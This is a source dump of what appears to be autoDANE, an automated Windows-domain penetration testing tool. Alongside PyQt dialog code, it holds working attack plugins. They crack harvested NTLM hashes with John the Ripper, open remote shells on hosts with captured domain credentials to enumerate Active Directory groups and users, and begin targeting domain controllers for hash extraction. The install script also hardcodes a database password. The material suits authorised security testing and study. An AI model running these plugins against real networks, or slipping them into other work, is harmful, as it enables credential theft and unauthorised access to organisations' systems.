--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 485
10 | 275
11 |
12 |
13 |
14 | Confirmation
15 |
16 |
17 | true
18 |
19 |
20 | true
21 |
22 |
23 | -
24 |
25 |
-
26 |
27 |
28 |
29 | 221
30 | 221
31 |
32 |
33 |
34 |
35 | 221
36 | 221
37 |
38 |
39 |
40 | ?
41 |
42 |
43 |
44 | -
45 |
46 |
47 | Are you sure?
48 |
49 |
50 |
51 |
52 |
53 | -
54 |
55 |
56 | Yes
57 |
58 |
59 |
60 | -
61 |
62 |
63 | No
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/inputwindows/newtask.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_newtask import Ui_Dialog
5 |
6 | class NewTask(QDialog, Ui_Dialog):
7 | def __init__(self, parent=None):
8 | QDialog.__init__(self, parent)
9 | self.setupUi(self)
10 |
11 | db = None
12 |
13 | def setup(self):
14 | cursor = self.db.cursor()
15 | cursor.execute("select category from task_categories")
16 | items = [ "" ]
17 | for row in cursor.fetchall():
18 | items.append(row[0])
19 | self.cmbCategory.addItems(items)
20 | cursor.close()
21 |
22 | def validate(self):
23 | result = False
24 |
25 | if self.cmbCategory.currentText() != "" and self.txtName.text() != "" and self.txtDescription.toPlainText() != "" and self.txtFileName.text() != "":
26 | result = True
27 |
28 | return result
29 |
30 | @pyqtSignature("")
31 | def on_btnSave_clicked(self):
32 | if self.validate():
33 | self.accept()
34 | else:
35 | QMessageBox.information(self, "Information", "You need to fill in all the fields")
36 |
37 | @pyqtSignature("")
38 | def on_btnCancel_clicked(self):
39 | self.reject()
40 |
--------------------------------------------------------------------------------
/inputwindows/newtask.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 414
10 | 389
11 |
12 |
13 |
14 | New Task
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 |
28 | 110
29 | 0
30 |
31 |
32 |
33 |
34 | 110
35 | 16777215
36 |
37 |
38 |
39 | Category
40 |
41 |
42 |
43 | -
44 |
45 |
46 |
47 |
48 | -
49 |
50 |
-
51 |
52 |
53 |
54 | 110
55 | 0
56 |
57 |
58 |
59 |
60 | 110
61 | 16777215
62 |
63 |
64 |
65 | Name
66 |
67 |
68 |
69 | -
70 |
71 |
72 |
73 |
74 | -
75 |
76 |
-
77 |
78 |
79 |
80 | 110
81 | 0
82 |
83 |
84 |
85 |
86 | 110
87 | 16777215
88 |
89 |
90 |
91 | Description
92 |
93 |
94 |
95 | -
96 |
97 |
98 |
99 |
100 | -
101 |
102 |
-
103 |
104 |
105 |
106 | 110
107 | 0
108 |
109 |
110 |
111 |
112 | 110
113 | 16777215
114 |
115 |
116 |
117 | File Name
118 |
119 |
120 |
121 | -
122 |
123 |
124 |
125 |
126 | -
127 |
128 |
-
129 |
130 |
131 |
132 | 110
133 | 0
134 |
135 |
136 |
137 |
138 | 110
139 | 16777215
140 |
141 |
142 |
143 | Uses Metasploit
144 |
145 |
146 |
147 | -
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 | -
157 |
158 |
-
159 |
160 |
161 |
162 | 110
163 | 0
164 |
165 |
166 |
167 |
168 | 110
169 | 16777215
170 |
171 |
172 |
173 | Is Recursive
174 |
175 |
176 |
177 | -
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 | -
187 |
188 |
-
189 |
190 |
191 |
192 | 110
193 | 0
194 |
195 |
196 |
197 |
198 | 110
199 | 16777215
200 |
201 |
202 |
203 | Enabled
204 |
205 |
206 |
207 | -
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 | -
217 |
218 |
219 | Qt::Vertical
220 |
221 |
222 |
223 | 20
224 | 40
225 |
226 |
227 |
228 |
229 |
230 |
231 | -
232 |
233 |
-
234 |
235 |
236 | Save
237 |
238 |
239 |
240 | -
241 |
242 |
243 | Cancel
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
--------------------------------------------------------------------------------
/inputwindows/newtrigger.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_newtrigger import Ui_Dialog
5 |
6 |
7 | class NewTrigger(QDialog, Ui_Dialog):
8 | def __init__(self, parent=None):
9 | QDialog.__init__(self, parent)
10 | self.setupUi(self)
11 |
12 | db = None
13 |
14 | categories = { "":-1 }
15 | triggers = { "":-1 }
16 | def setup(self):
17 | self.cmbCategory.addItem("")
18 | cursor = self.db.cursor()
19 | cursor.execute ("select id, category from task_categories")
20 | for row in cursor.fetchall():
21 | self.categories[row[1]] = row[0]
22 | self.cmbCategory.addItem(row[1])
23 | cursor.close()
24 |
25 | self.cmbTriggers.addItem("")
26 | cursor = self.db.cursor()
27 | cursor.execute ("select id, trigger_name from trigger_descriptions")
28 | for row in cursor.fetchall():
29 | self.triggers[row[1]] = row[0]
30 | self.cmbTriggers.addItem(row[1])
31 | cursor.close()
32 |
33 |
34 | def validate(self):
35 | if self.cmbTriggers.currentText() != "" and self.txtValueMask.text() != "" and self.cmbCategory.currentText() != "" and self.cmbTasks.currentText() != "":
36 | return True
37 | else:
38 | return False
39 |
40 | @pyqtSignature("")
41 | def on_btnSave_clicked(self):
42 | if self.validate():
43 | cursor = self.db.cursor()
44 | sql = "insert into trigger_events (trigger_descriptions_id, task_descriptions_id, value_mask, enabled) values (%s, %s, %s, %s)"
45 | trigger_id = self.triggers[str(self.cmbTriggers.currentText())]
46 | task_id = self.tasks[str(self.cmbTasks.currentText())]
47 | cursor.execute(sql, (trigger_id, task_id, str(self.txtValueMask.text()), self.cbxEnabled.isChecked(), ))
48 | cursor.close()
49 | self.accept()
50 | else:
51 | QMessageBox.information(self, "Information", "You need to fill in all the fields")
52 |
53 | @pyqtSignature("")
54 | def on_btnCancel_clicked(self):
55 | self.reject()
56 |
57 | tasks = { "":-1 }
58 | @pyqtSignature("int")
59 | def on_cmbCategory_currentIndexChanged(self, index):
60 | self.tasks = { "":-1 }
61 | self.cmbTasks.clear()
62 | self.cmbTasks.addItem("")
63 | sql = "select id, task_name from task_descriptions where task_categories_id = %s"
64 | cursor = self.db.cursor()
65 | cursor.execute(sql, (self.categories[str(self.cmbCategory.currentText())], ))
66 | for row in cursor.fetchall():
67 | self.tasks[row[1]] = row[0]
68 | self.cmbTasks.addItem(row[1])
69 |
--------------------------------------------------------------------------------
/inputwindows/newtrigger.py2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/inputwindows/newtrigger.py2
--------------------------------------------------------------------------------
/inputwindows/newtrigger.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 385
10 | 260
11 |
12 |
13 |
14 | New Event
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 |
28 | 110
29 | 0
30 |
31 |
32 |
33 |
34 | 110
35 | 16777215
36 |
37 |
38 |
39 | Trigger
40 |
41 |
42 |
43 | -
44 |
45 |
46 |
47 |
48 | -
49 |
50 |
-
51 |
52 |
53 |
54 | 110
55 | 0
56 |
57 |
58 |
59 |
60 | 110
61 | 16777215
62 |
63 |
64 |
65 | Value Mask
66 |
67 |
68 |
69 | -
70 |
71 |
72 |
73 |
74 | -
75 |
76 |
-
77 |
78 |
79 |
80 | 110
81 | 0
82 |
83 |
84 |
85 |
86 | 110
87 | 16777215
88 |
89 |
90 |
91 | Task Category
92 |
93 |
94 |
95 | -
96 |
97 |
98 |
99 |
100 | -
101 |
102 |
-
103 |
104 |
105 |
106 | 110
107 | 0
108 |
109 |
110 |
111 |
112 | 110
113 | 16777215
114 |
115 |
116 |
117 | Task Name
118 |
119 |
120 |
121 | -
122 |
123 |
124 |
125 |
126 | -
127 |
128 |
-
129 |
130 |
131 |
132 | 110
133 | 0
134 |
135 |
136 |
137 |
138 | 110
139 | 16777215
140 |
141 |
142 |
143 | Enabled
144 |
145 |
146 |
147 | -
148 |
149 |
150 |
151 |
152 |
153 | true
154 |
155 |
156 |
157 |
158 |
159 | -
160 |
161 |
162 | Qt::Vertical
163 |
164 |
165 |
166 | 20
167 | 40
168 |
169 |
170 |
171 |
172 |
173 |
174 | -
175 |
176 |
-
177 |
178 |
179 | Save
180 |
181 |
182 |
183 | -
184 |
185 |
186 | Cancel
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
--------------------------------------------------------------------------------
/inputwindows/textinput.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_textinput import Ui_Dialog
5 |
6 |
7 | class wndTextInput(QDialog, Ui_Dialog):
8 | def __init__(self, parent=None):
9 | QDialog.__init__(self, parent)
10 | self.setupUi(self)
11 |
12 | @pyqtSignature("")
13 | def on_btnOk_clicked(self):
14 | if self.txtDomain.text() == "" or self.txtLootFileName.text() == "":
15 | QMessageBox.information(self, "Information", "You need to fill in both fields")
16 | else:
17 | self.accept()
18 |
19 | @pyqtSignature("")
20 | def on_btnCancel_clicked(self):
21 | self.reject()
22 |
--------------------------------------------------------------------------------
/inputwindows/textinput.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 423
10 | 172
11 |
12 |
13 |
14 | Dialog
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 |
28 | 75
29 | 0
30 |
31 |
32 |
33 | Domain
34 |
35 |
36 |
37 | -
38 |
39 |
40 |
41 |
42 | -
43 |
44 |
-
45 |
46 |
47 |
48 | 75
49 | 0
50 |
51 |
52 |
53 | Loot File
54 |
55 |
56 |
57 | -
58 |
59 |
60 |
61 |
62 | -
63 |
64 |
65 | Qt::Vertical
66 |
67 |
68 |
69 | 20
70 | 40
71 |
72 |
73 |
74 |
75 | -
76 |
77 |
-
78 |
79 |
80 | Qt::Horizontal
81 |
82 |
83 |
84 | 40
85 | 20
86 |
87 |
88 |
89 |
90 | -
91 |
92 |
93 | OK
94 |
95 |
96 |
97 | -
98 |
99 |
100 | Cancel
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
--------------------------------------------------------------------------------
/install:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | apt-get install -y msgpack-python python-twisted python-pip wkhtmltopdf libssl-dev libffi-dev python-dev build-essential
4 |
5 | pip install netifaces
6 | pip install docxtpl
7 | pip install impacket
8 | pip install crackmapexec
9 |
10 | git clone git://github.com/SpiderLabs/msfrpc.git msfrpc
11 | cd msfrpc/python-msfrpc/
12 | python setup.py install
13 | cd ../..
14 | rm -r msfrpc/
15 |
16 | wget http://download.gna.org/wkhtmltopdf/0.12/0.12.3/wkhtmltox-0.12.3_linux-generic-amd64.tar.xz
17 | tar -xvf wkhtmltox-0.12.3_linux-generic-amd64.tar.xz
18 | cp -r wkhtmltox/bin/* /usr/bin/
19 | cp -r wkhtmltox/include/* /usr/include/
20 | cp -r wkhtmltox/lib/* /usr/lib/
21 | cp -r wkhtmltox/share/* /usr/share/
22 | rm -r wkhtmltox/
23 |
24 | service postgresql start
25 | sudo -u postgres bash -c "psql -c \"create user autodane with password 'OHZdz7CW8Lv4PCa';\""
26 | sudo -u postgres bash -c "psql < createdb.sql"
27 | sudo -u postgres bash -c "psql autodane < createdbstructure.sql"
28 | sudo -u postgres bash -c "psql autodane -c \"grant all privileges on all tables in schema public to autodane\""
29 | sudo -u postgres bash -c "psql autodane -c \"grant all privileges on all sequences in schema public to autodane\""
30 |
31 | mkdir temp
32 | mkdir logs
33 |
--------------------------------------------------------------------------------
/main/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/main/__init__.py
--------------------------------------------------------------------------------
/msf/.exploit.py.swn:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/msf/.exploit.py.swn
--------------------------------------------------------------------------------
/msf/.exploit.py.swo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/msf/.exploit.py.swo
--------------------------------------------------------------------------------
/msf/.exploit.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/msf/.exploit.py.swp
--------------------------------------------------------------------------------
/msf/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/msf/__init__.py
--------------------------------------------------------------------------------
/plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/__init__.py
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.buenumerate_users_and_groups.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.buenumerate_users_and_groups.py.swp
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.enumerate_groups.py.swo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.enumerate_groups.py.swo
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.enumerate_groups.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.enumerate_groups.py.swp
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.enumerate_users.py.swo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.enumerate_users.py.swo
--------------------------------------------------------------------------------
/plugins/domain_enumeration/.enumerate_users.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/.enumerate_users.py.swp
--------------------------------------------------------------------------------
/plugins/domain_enumeration/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/domain_enumeration/__init__.py
--------------------------------------------------------------------------------
/plugins/domain_enumeration/bruteforce_ntlm_hashes.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | def run(params):
4 | known_passwords_fn = "temp/{0}".format(params.getRandomFileName())
5 | unknown_hashes_fn = "temp/{0}".format(params.getRandomFileName())
6 |
7 | fh = open(known_passwords_fn, 'w')
8 | cursor = params.db.cursor()
9 | cursor.execute("""select cleartext_password from domain_credentials where footprint_id = %s and cleartext_password != '' """, (params.footprint_id, ))
10 | #cursor.execute("""select cleartext_password from domain_credentials where footprint_id = %s and cleartext_password != "" """, (params.footprint_id, ))
11 | for row in cursor.fetchall():
12 | fh.write(row[0] + "\n")
13 | fh.close()
14 | cursor.close()
15 |
16 | fh = open(unknown_hashes_fn, 'w')
17 | cursor = params.db.cursor()
18 | #Including know password/hash combos will feed the john.pot file with creds from memory, which might otherwise have been difficult to recover
19 | cursor.execute("""select domain, username, ntlm_hash from domain_credentials where footprint_id = %s and ntlm_hash != '' """, (params.footprint_id, ))
20 | #cursor.execute("""select domain, username, ntlm_hash from domain_credentials where footprint_id = %s and cleartext_password = "" and ntlm_hash != "" """, (params.footprint_id, ))
21 | for row in cursor.fetchall():
22 | fh.write("{0}${1}:{2}\n".format(row[0], row[1], row[2]))
23 | fh.close()
24 | cursor.close()
25 |
26 | cmd = "john {0} --format=NT --wordlist={1}".format(unknown_hashes_fn, known_passwords_fn)
27 | #cmd = "john {0} --format=NT --wordlist={1}".format(unknown_hashes_fn, known_passwords_fn)
28 | os.popen(cmd)
29 | #params.log(cmd)
30 |
31 | cmd = "timeout 300 john {0} --format=NT".format(unknown_hashes_fn)
32 | os.popen(cmd)
33 | #params.log(cmd)
34 |
35 | #cmd = "john {0} --format=NT --show".format(unknown_hashes_fn)
36 | cmd = "john {0} --format=NT --show".format(unknown_hashes_fn)
37 | output = os.popen(cmd).read()
38 | params.log(cmd)
39 | params.log("")
40 | params.log(output)
41 |
42 | for row in output.split("\n"):
43 | if row != "":
44 | if row.find("password hashes cracked, ") == -1:
45 | domain = row.split("$")[0]
46 | username = row.split("$")[1].split(":")[0]
47 | password = row.split("$")[1].split(":")[1]
48 |
49 | if password != "":
50 | cursor = params.db.cursor()
51 | cursor.execute("select addDomainCreds(%s, %s, %s, %s, %s, '', '')", (params.footprint_id, 0, domain, username, password, ))
52 | cursor.close()
53 |
--------------------------------------------------------------------------------
/plugins/domain_enumeration/enumerate_groups.py:
--------------------------------------------------------------------------------
1 | import time
2 | import asyncproc
3 | import os
4 | import base64
5 | from msf import exploit
6 |
7 | def runCmd(proc, cmd):
8 | proc.write(cmd + "\n")
9 | time.sleep(0.5)
10 | result = ""
11 | gotShell = False
12 |
13 | startTime = time.time()
14 | while gotShell == False:
15 | poll = proc.wait(os.WNOHANG)
16 | out = proc.read()
17 | time.sleep(0.25)
18 |
19 | if time.time() - startTime >= 120:
20 | print "too much time has passed. quitting"
21 | return ""
22 |
23 | if out != "":
24 | result += result + out
25 | if out.upper().find("Windows".upper()) > -1:
26 | gotShell = True
27 | return result
28 |
29 | def run(params):
30 | sql = """
31 | select
32 | d.id,
33 | hd.ip_address,
34 | dc.domain, dc.username, dc.cleartext_password,
35 | m.id
36 | from
37 | domains d
38 | join domain_credentials dc on d.domain_name = dc.domain
39 | join domain_credentials_map m on m.domain_credentials_id = dc.id
40 | join host_data hd on m.host_data_id = hd.id
41 | where
42 | d.footprint_id = dc.footprint_id and
43 | d.footprint_id = hd.footprint_id and
44 | d.footprint_id = m.footprint_id and
45 | m.valid = true and
46 | d.info_gathered = false and
47 | m.psexec_failed = false and
48 | m.dgu_failed = false and
49 | d.id not in (select item_identifier from task_list where task_descriptions_id = 20 and footprint_id = %s and in_progress = true) and
50 | hd.footprint_id = %s order by username limit 1
51 | """
52 |
53 | cursor = params.db.cursor()
54 | cursor.execute(sql, (params.footprint_id, params.footprint_id, ))
55 | row = cursor.fetchone()
56 | cursor.close()
57 |
58 | if row != None:
59 | cursor = params.db.cursor()
60 | cursor.execute("select addTaskListItem(%s, 20, %s, true, false)", (params.footprint_id, row[0], ))
61 | task_id = cursor.fetchone()[0]
62 | cursor.close()
63 |
64 | log = ""
65 | cmd = "./software/adsmbexec.py {}/{}:{}@{}".format(row[2],row[3],row[4],row[1])
66 | params.log(cmd)
67 | proc = asyncproc.Process(["./software/adsmbexec.py", "{}/{}:{}@{}".format(row[2],row[3],row[4],row[1])])
68 | runWithDifferentUser = False
69 | gotShell = False
70 | startTime = time.time()
71 | while True:
72 | poll = proc.wait(os.WNOHANG)
73 | out = proc.read()
74 | time.sleep(0.25)
75 |
76 | if time.time() - startTime >= 60:
77 | #print "too much time has passed. quitting"
78 | log = log + "too much time has passed. quitting" + "\r\n"
79 | params.log("too much time has passed. quitting")
80 |
81 | break
82 |
83 | if out != "":
84 | #print out
85 | log = log + out + "\r\n"
86 | params.log(out)
87 | if out.upper().find("Windows".upper()) > -1:
88 | gotShell = True
89 | break
90 | elif out.upper().find("STATUS_SHARING_VIOLATION".upper()) > -1:
91 | proc = None
92 | runWithDifferentUser = True
93 | break
94 | elif out.upper().find("SMB SessionError".upper()) > -1:
95 | proc = None
96 | runWithDifferentUser = True
97 | break
98 | elif out.upper().find("rpc_x_bad_stub_data".upper()) > -1:
99 | proc = None
100 | runWithDifferentUser = True
101 | break
102 | elif out.upper().find("Unexpected answer from server".upper()) > -1:
103 | proc = None
104 | runWithDifferentUser = True
105 | break
106 | elif out.upper().find("The target principal name is incorrect".upper()) > -1:
107 | runWithDifferentUser = True
108 | # TODO update this host, set psexec_failed = true
109 | elif out.upper().find("'dsquery' is not recognized as an internal or external command".upper()) > -1:
110 | runWithDifferentUser = True
111 | if runWithDifferentUser:
112 | cursor = params.db.cursor()
113 | cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (row[5], ))
114 | cursor.close()
115 |
116 |
117 | if gotShell:
118 | out = runCmd(proc, "dsquery group -limit 0")
119 | #for l in runCmd(proc, "dsquery group -limit 0").split("\n"):
120 | for l in out.split("\n"):
121 | #group = l.split(",")[0].split("=")[1],
122 | #print l
123 | log = log + l + "\r\n"
124 | params.log(l)
125 |
126 | if l.find("'dsquery' is not recognized as an internal or external command") != -1:
127 | runWithDifferentUser = True
128 | break
129 |
130 | if l != "":
131 | if l.split(",")[0].split("=")[1].find("{") == -1:
132 | #print "group [{}]".format(l.split(",")[0].split("=")[1],)
133 | cursor = params.db.cursor()
134 | cursor.execute("select addDomainGroup(%s, %s, %s)", (params.footprint_id, row[0], l.split(",")[0].split("=")[1], ))
135 | cursor.close()
136 | else:
137 | break
138 | time.sleep(0.5)
139 |
140 | proc.write("exit\n")
141 | time.sleep(2)
142 |
143 | if runWithDifferentUser == True:
144 | cursor = params.db.cursor()
145 | cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (row[5], ))
146 | cursor.close()
147 |
148 | #print "output [{}]".format(out)
149 | if out is not "":
150 | if not runWithDifferentUser:
151 | spCursor = params.db.cursor()
152 | spCursor.execute("update domains set info_gathered = true where id = %s", (row[0], ))
153 | spCursor.close()
154 |
155 |
156 | final_output = ""
157 | while params.log_queue.empty() == False:
158 | final_output += "{0}\r\n".format(params.log_queue.get(False))
159 | final_output = final_output[:-2]
160 |
161 | spCursor = params.db.cursor()
162 | spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", ( task_id, False, True, base64.b64encode(final_output), ))
163 | spCursor.close()
164 | #else:
165 | #params.log("nothing to check")
166 | # continue
167 |
--------------------------------------------------------------------------------
/plugins/domain_enumeration/enumerate_users.py:
--------------------------------------------------------------------------------
1 | import time
2 | import asyncproc
3 | import os
4 | import base64
5 | from msf import exploit
6 |
7 | def CountDomainGroupsToExpand(params):
8 | count = 0
9 |
10 | cursor = params.db.cursor()
11 | cursor.execute("select * from countdomaingroupstoexpand(%s)", (params.footprint_id, ))
12 | for r in cursor.fetchall():
13 | count = r[0]
14 | cursor.close()
15 |
16 | return count
17 |
18 | def GetDomainGroupToExpand(params):
19 | result = None
20 |
21 | cursor = params.db.cursor()
22 | cursor.execute("select * from getdomaingrouptoexpand(%s)", (params.footprint_id, ))
23 | result = cursor.fetchone()
24 | cursor.close()
25 |
26 | return result
27 |
28 | def AddTaskListItem(params, domain_group_id):
29 | cursor = params.db.cursor()
30 | cursor.execute("select addTaskListItem(%s, 26, %s, true, false)", (params.footprint_id, domain_group_id, ))
31 | task_id = cursor.fetchone()[0]
32 | cursor.close()
33 | return task_id
34 |
35 | def GetProcess(params, domain, username, password, host, map_id):
36 | proc = None
37 | #try:
38 | if True:
39 | proc = asyncproc.Process(["./software/adsmbexec.py", "{}/{}:{}@{}".format(domain, username, password, host)])
40 | runWithDifferentUser = False
41 | gotShell = False
42 | startTime = time.time()
43 | while True:
44 | poll = proc.wait(os.WNOHANG)
45 | out = proc.read()
46 | time.sleep(0.25)
47 |
48 | if time.time() - startTime >= 60:
49 | #print "too much time has passed. quitting"
50 | #log = log + "too much time has passed. quitting" + "\r\n"
51 | #params.log("too much time has passed. quitting")
52 |
53 | break
54 |
55 | if out != "":
56 | print out
57 |
58 | if out.upper().find("Windows".upper()) > -1:
59 | gotShell = True
60 | break
61 | elif out.upper().find("STATUS_SHARING_VIOLATION".upper()) > -1:
62 | proc = None
63 | runWithDifferentUser = True
64 | break
65 | elif out.upper().find("SMB SessionError".upper()) > -1:
66 | proc = None
67 | runWithDifferentUser = True
68 | break
69 | elif out.upper().find("rpc_x_bad_stub_data".upper()) > -1:
70 | proc = None
71 | runWithDifferentUser = True
72 | break
73 | elif out.upper().find("Unexpected answer from server".upper()) > -1:
74 | proc = None
75 | runWithDifferentUser = True
76 | break
77 | elif out.upper().find("The target principal name is incorrect".upper()) > -1:
78 | runWithDifferentUser = True
79 | # TODO update this host, set psexec_failed = true
80 | elif out.upper().find("'dsquery' is not recognized as an internal or external command".upper()) > -1:
81 | runWithDifferentUser = True
82 | if runWithDifferentUser:
83 | cursor = params.db.cursor()
84 | cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (map_id, ))
85 | cursor.close()
86 |
87 | return proc
88 |
89 | def runCmd(proc, cmd):
90 | proc.write(cmd + "\n")
91 | time.sleep(0.5)
92 | result = ""
93 | gotShell = False
94 |
95 | startTime = time.time()
96 | while gotShell == False:
97 | poll = proc.wait(os.WNOHANG)
98 | out = proc.read()
99 | time.sleep(0.25)
100 |
101 | if time.time() - startTime >= 120:
102 | print "too much time has passed. quitting"
103 | return ""
104 |
105 | if out != "":
106 | result += result + out
107 | if out.upper().find("Windows".upper()) > -1:
108 | gotShell = True
109 | return result
110 |
111 |
112 | def AddDomainUserToGroup(params, domain_id, user, group_id):
113 | cursor = params.db.cursor()
114 | cursor.execute("select addDomainUserToGroup(%s, %s, %s, %s)", (params.footprint_id, domain_id, user, group_id, ))
115 | cursor.close()
116 |
117 |
118 | def run(params):
119 | if CountDomainGroupsToExpand(params) > 0:
120 | starttime = time.time()
121 |
122 | group_info = GetDomainGroupToExpand(params)
123 | print group_info
124 | out = ""
125 | proc = GetProcess(params, group_info[2], group_info[3], group_info[4], group_info[1], group_info[5])
126 | if proc != None:
127 | while CountDomainGroupsToExpand(params) > 0 and (time.time() - starttime) < 60 * 5 and out != "timeout":
128 | group_info = GetDomainGroupToExpand(params)
129 | if group_info == None:
130 | print "nothing left to do, so quitting"
131 | #runCmd(proc, "exit")
132 |
133 | break
134 | else:
135 | task_id = AddTaskListItem(params, group_info[7])
136 | task_output = ""
137 |
138 | #cmd = """cmd /C "dsquery group -name "{0}" | dsget group -members" """.format(group_info[6])
139 | cmd = """cmd /C "dsquery group -name "{0}" | dsget group -members | dsget user -samid" """.format(group_info[6])
140 | print cmd
141 | out = runCmd(proc, cmd)
142 | print out
143 | task_output = "{}\n\n{}".format(cmd, out)
144 |
145 | for l in out.split("\n"):
146 | #print "DEBUG ::: [{}]".format(l)
147 | if l.find("'dsquery' is not recognized as an internal or external command") != -1:
148 | out = "timeout"
149 | else:
150 | l = l[:-1]
151 | #print "[{}] [{}]".format(l, l[:2])
152 | if l[:2] == " ":
153 | if l.strip() != "samid":
154 | #print "add user [{}] to group [{}][{}]".format(l.strip(), group_info[0], group_info[7])
155 | AddDomainUserToGroup(params, group_info[0], l.strip(), group_info[7])
156 | # if l[2:] == " ":
157 | # if l not in [ "", "C:\Windows\system32", "timeou" ] and l.find("CN=Users") != -1:
158 | # user = l.split(",")[0].split("=")[1]
159 | #
160 | # add_user = True
161 | # users_blacklist = [ "SystemMailbox", "DiscoverySearchMailbox", "FederatedEmail" ]
162 | # for u in users_blacklist:
163 | # if user.find(u) > -1:
164 | # add_user = False
165 | # break
166 | #
167 | # if add_user:
168 | # AddDomainUserToGroup(params, group_info[0], user[:45], group_info[7])
169 |
170 | if out == "timeout":
171 | print "DEBUG ::: run as different user"
172 | cursor = params.db.cursor()
173 | cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (group_info[5], ))
174 | cursor.close()
175 |
176 | spCursor = params.db.cursor()
177 | spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", ( task_id, False, False, base64.b64encode(task_output), ))
178 | spCursor.close()
179 |
180 | #spCursor = params.db.cursor()
181 | #spCursor.execute("update domain_groups set users_gathered = true where id = %s", (group_info[7], ))
182 | #spCursor.close()
183 | else:
184 |
185 | spCursor = params.db.cursor()
186 | spCursor.execute("update domain_groups set users_gathered = true where id = %s", (group_info[7], ))
187 | spCursor.close()
188 |
189 | spCursor = params.db.cursor()
190 | spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", ( task_id, False, True, base64.b64encode(task_output), ))
191 | spCursor.close()
192 |
193 | time.sleep(0.5)
194 |
195 |
196 | time.sleep(0.5)
197 | proc.write("exit\n")
198 | time.sleep(1)
199 |
--------------------------------------------------------------------------------
/plugins/domain_enumeration/extract_domain_hashes.py:
--------------------------------------------------------------------------------
1 | import random
2 | import time
3 | import string
4 | from msf import exploit
5 | import os
6 | import base64
7 |
8 | def run(params):
9 | sql = """
10 | select
11 | d.id,
12 | hd.ip_address,
13 | dc.domain, dc.username, dc.cleartext_password,
14 | m.id
15 | from
16 | host_data hd
17 | join domains d on upper(d.domain_name) = upper(hd.domain)
18 | join domain_credentials_map m on m.host_data_id = hd.id
19 | join domain_credentials dc on dc.id = m.domain_credentials_id
20 | where
21 | hd.footprint_id = %s and
22 | d.footprint_id = dc.footprint_id and
23 | d.footprint_id = hd.footprint_id and
24 | d.footprint_id = m.footprint_id and
25 | hd.is_dc = true and
26 | m.valid = true and
27 | d.hashes_extracted = false and
28 | m.psexec_failed = false and
29 | d.id not in (select item_identifier from task_list where task_descriptions_id = 21 and footprint_id = %s and in_progress = true) and
30 | hd.ip_address != '10.100.3.22'
31 | """
32 |
